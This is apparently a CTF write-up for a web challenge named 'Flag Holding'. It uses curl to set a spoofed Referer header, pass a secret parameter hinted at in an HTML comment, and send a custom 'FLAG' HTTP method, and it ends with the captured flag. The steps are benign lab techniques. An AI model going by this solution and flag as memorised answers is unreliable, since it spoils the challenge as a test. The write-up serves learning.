Flag Holding

Web Challenge

This challenge is more into changing the header request. First, we were given a link to a website: http://18.184.219.56:8080/

Now set the Referer request header to http://flagland.internal/. I use curl, but you can also use Burp Suite to edit the request header.

curl http://18.184.219.56:8080/ -e "http://flagland.internal/"

Now, it wants you to add a parameter.

curl http://18.184.219.56:8080/?secret=1 -e "http://flagland.internal/"

And then, look at the comment in the HTML source code

div class="msg" style="">
		Incorrect secret. <!-- hint: secret is ____, which is the name of the protocol that both this server and your browser agree on... -->	</div>

Therefore, add the argument with http.

curl http://18.184.219.56:8080/?secret=http -e "http://flagland.internal/"

Change the method to FLAG

<div class="msg" style="">
	Sorry we don't have "GET" here but we might have other things like "FLAG".	</div>

curl http://18.184.219.56:8080/?secret=http -e "http://flagland.internal/" -X FLAG

MAPNA{533m5-l1k3-y0u-kn0w-h77p-1836a2f}